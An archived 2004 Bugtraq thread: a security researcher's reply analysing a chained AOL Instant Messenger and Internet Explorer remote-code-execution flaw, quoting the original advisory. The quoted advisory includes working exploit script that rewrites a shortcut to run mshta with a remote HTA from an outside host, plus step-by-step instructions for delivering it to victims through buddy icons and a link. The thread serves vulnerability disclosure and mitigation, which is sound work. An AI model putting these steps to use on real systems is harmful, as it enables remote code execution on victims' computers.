RE: Aol Instant Messenger/Microsoft Internet Explorer remote code execution

To: "'Michael Evanchik'" <mike@xxxxxxxxxxxxxxx>, <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: RE: Aol Instant Messenger/Microsoft Internet Explorer remote code execution
From: "Thor Larholm" <thor@xxxxxxxx>
Date: Thu, 19 Feb 2004 11:49:08 -0800
Importance: Normal
In-reply-to: <20040219020644.32708.qmail@xxxxxxxxxxxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

That's a very good example of combining several existing vulnerabilities
into a new exploit, a practice which is becoming increasingly necessary
to practically exploit IE vulnerabilities.

AIM predictable file location weakness, to plant a file
The shell: protocol vulnerability, to switch security zone
ShellApplication in the My Computer zone, to elevate privileges further

As most IE exploits this one relies on the additional privileges given
by the My Computer zone. Locking down this zone will prevent this
exploit, and many others, and has been discussed in the past on this
list.

http://www.securityfocus.com/archive/1/346174/2003-11-30/2003-12-06/2

Cheng Peng Su wrote about the shell: protocol on February 10, 2004, but
Eiji James Yoshida originally detailed this vulnerability on October 8,
2003

http://www.securityfocus.com/bid/7826
http://www.geocities.co.jp/SiliconValley/1667/advisory08e.html

That advisory was itself an extension of his findings from June 5, 2003.

Eiji believed this issue to only be exploitable on Windows Server 2003,
but the implications extend to Windows XP and Windows 2000 as well.

Being able to store arbitrary content in a predictable file location is
a vulnerability category of its own and a premise, and have
traditionally been performed with a variety of applications such as

Macromedia Flash Player
http://www.securityfocus.com/bid/8900
Nullsoft Winamp
http://www.securityfocus.com/bid/5266
ICQ
http://www.securityfocus.com/bid/5247

The AIM predictable file location vulnerability you discovered is
another one to add on the list, and I am sure there are plenty of more
to be found in other messenger applications.

The POC on high-pow-er.com downloads and executes an HTA file which
writes "yay.exe" to your harddrive and executes it. 



Regards

Thor Larholm
Senior Security Researcher
PivX Solutions
24 Corporate Plaza #180
Newport Beach, CA 92660
http://www.pivx.com
thor@xxxxxxxx
Phone: +1 (949) 231-8496
PGP: 0x5A276569
6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569

PivX defines "Proactive Threat Mitigation". Get a FREE Beta Version of
Qwik-Fix
<http://www.qwik-fix.net> 

-----Original Message-----
From: Michael Evanchik [mailto:mike@xxxxxxxxxxxxxxx] 
Sent: Wednesday, February 18, 2004 6:07 PM
To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Aol Instant Messenger/Microsoft Internet Explorer remote code
execution




http://www.MichaelEvanchik.com/security/microsoft/ie/aim/aim.txt


Aol Instant Messenger/Microsoft Internet Explorer remote code execution

Feb 18, 2004


Vulnerable
----------
- Microsoft Internet Explorer 6.0 (lower was not tested)
- Microsoft Windows XP Pro
- Microsoft Windows XP Home
- Microsoft Windows 2003 Server Enterprise
- AOL Instant Messenger 5.5 to 4.3 tested


Not Vulnerable
--------------
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server
- Microsoft Windows 9X


Severity
---------
High - Remote code execution


In English
----------
    There is a problem in internet explorer where a file can be
displayed as html even though the file is not an html file.  Also the
file can be run in My Computer zone where lower 
restrictions apply.  Aol instant messenger buddy icons (and maybe themes
not tested) is 
just ONE way to get a file in a known location on the hard drive.  All
environments where tested fully patched from Windows Update and double
checked with Microsoft Baseline Security Analyzer 1.2


Tech Stuff and Explanation
--------------------------
1. Use a 3rd party Aol instant messenger client so that it allows you to
import a file that
   uses a local html execution code.  In my case I used...

&lt;script&gt;
var ok = new ActiveXObject("Shell.Application");
f = ok.NameSpace("C:\\Documents and Settings\\All Users\\Start
Menu\\Programs\\Accessories"); i= f.ParseName("Paint.lnk"); l =
i.GetLink; l.Path = "mshta.exe" l.Arguments
="http://www.high-pow-er.com/ok.hta";
l.Save("C:\\paint.lnk");
ok.Open("C:\\paint.lnk");
&lt;/script&gt;
   

2. Send an instant message to ANOTHER name on a real AOL Instant
Messenger client to YOURSELF first.
   Make sure the victim (yourself in this case) is on your buddy list
before you instant message the 
   victim (yourself).  I think that helps send the icon right away. 

   Then look in c:\documents and settings\username\application
data\aim\bartcache\1\

   Look for the newest file that came in that directory (you can tell by
sorting by date modified)  
   It's usually only 1k. If your unsure, open the file in Notepad to
find the html above.
   This will be the filename that EVERYONE gets.  For some reason its
permanent 
   for any AOL user every time the icon is imported.

3. Now your ready to create your html page on a web server. 

   In the html webpage all that is needed is simply...

<iframe src="shell:appdata\aim\bartcache\1\file name you got from
step2"></iframe>

This will not need to be changed ever again since your filename and
location is permanent for everyone on AOL.


4. Send a message with a hyperlink to your page.



Proof of Concept?
----------------
- If the bot is online you can instant message the screen name
Michael Evanchik
  but don't be lazy, just follow the instructions above [=


Vendor Recommendations
---------------------
- America Online should not use a static directory and static file names
for buddy icons. 
  It would also help to filter server side for malicious buddy icon
content.

- Microsoft should pay BETTER people to test their software instead of
rewards for virus writers
  Also the shell: protocol should not be allowed in html page or at 
  least consider the content Internet Zone instead of My computer Zone


Temp Fix
-------------
- Turn off buddy icons in My Aim > Edit Options > Edit Preferences >
Buddy Icons
- Disable scripting in Internet Explorer
- Do not use Internet Explorer, use Mozilla Firebird (now known as
FireFox  www.mozilla.org)


Credit
------
Cheng Peng Su for the shell: protocol discovery
Http equiv and jelmer for the local html execution code and examples
advisories. Liu Die Yu because of his nice webpage of bugs at
http://umbrella.mx.tc/


Greets
------
- slacker my other brain
- illwill at illmob.org
- abe,rain and dolan


Contact
-------
Mike@xxxxxxxxxxxxxxxxxxx
http://www.MichaelEvanchik.com - me

http://Software.High-Pow-er.com - Need a professional programmer?
http://www.High-Pow-er.com - Other, Security, Consulting

References:
- Aol Instant Messenger/Microsoft Internet Explorer remote code execution
  - From: Michael Evanchik

Prev by Date: APC 9606 SmartSlot Web/SNMP management card "backdoor" - Telnet can't be disabled.
Next by Date: Cisco Security Advisory: Cisco ONS 15327, ONS 15454, ONS 15454 SDH, and ONS 15600 Vulnerabilities
Previous by thread: Aol Instant Messenger/Microsoft Internet Explorer remote code execution
Next by thread: Microsoft Internet Explorer Unspecified CHM File Processing Arbitrary Code Execution Vulnerability (bid 9658)
Index(es):
- Date
- Thread